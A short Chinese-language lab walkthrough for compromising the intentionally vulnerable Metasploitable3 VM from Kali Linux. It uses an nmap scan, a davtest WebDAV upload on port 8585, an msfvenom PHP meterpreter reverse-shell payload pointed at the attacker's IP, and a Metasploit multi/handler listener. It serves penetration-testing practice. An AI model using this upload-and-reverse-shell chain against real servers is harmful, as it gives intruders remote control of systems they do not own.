先備知識
- 知道如何使用 VMware 或 VirtualBox
- Kali Linux 基本操作
- 能夠讓 Kali 連線至 Metasploitable3
- 良好的網路環境
確認 IP
Win2k8:
ub1404:
弱點掃描
使用 Nmap 將所有 port 掃描一遍,查看主機上開啟的 Service
1
| sudo nmap -sV -sS -n -v --reason --open -p- <Metasploitable3 IP>
|
<Metasploitable3 IP> 請替換成靶機 IP
文件上傳漏洞
掃描 8585 port 是否存在文件上傳漏洞
1
| davtest -url http://<Metasploitable3 IP>:8585/uploads/
|
利用 msfvenom 生成 reverse shell payload
1
| msfvenom -p php/meterpreter_reverse_tcp LHOST=<Kali IP> LPORT=4444 -f raw > payload.php
|
<Kali IP> 請替換成 Kali Linux 的 IP
註:Reverse Shell 與 Bind Shell
* Reverse Shell: 讓受害者主動開 shell 給攻擊者,攻擊者要開 listener,並等受害者連線,因此需設定 LHOST/PORT 讓受害者連線
* Bind Shell: 在受害者開一個後門,接著攻擊者主動連線到受害者,因此需設定 RHOST/PORT 讓攻擊者連線
上傳 payload
1
| davtest -url http://<Metasploitable3 IP>:8585/uploads/ -upload payload.php -uploadloc DavTestDir_xxxxx/payload.php
|
使用 exploit/multi/handler 模組
1
| use exploit/multi/handler
|
設定 payload
1
| set payload php/meterpreter/reverse_tcp
|
設定參數
1
2
| set LHOST <Kali IP>
set LPORT 4444
|
執行
等待受害者點擊 payload.php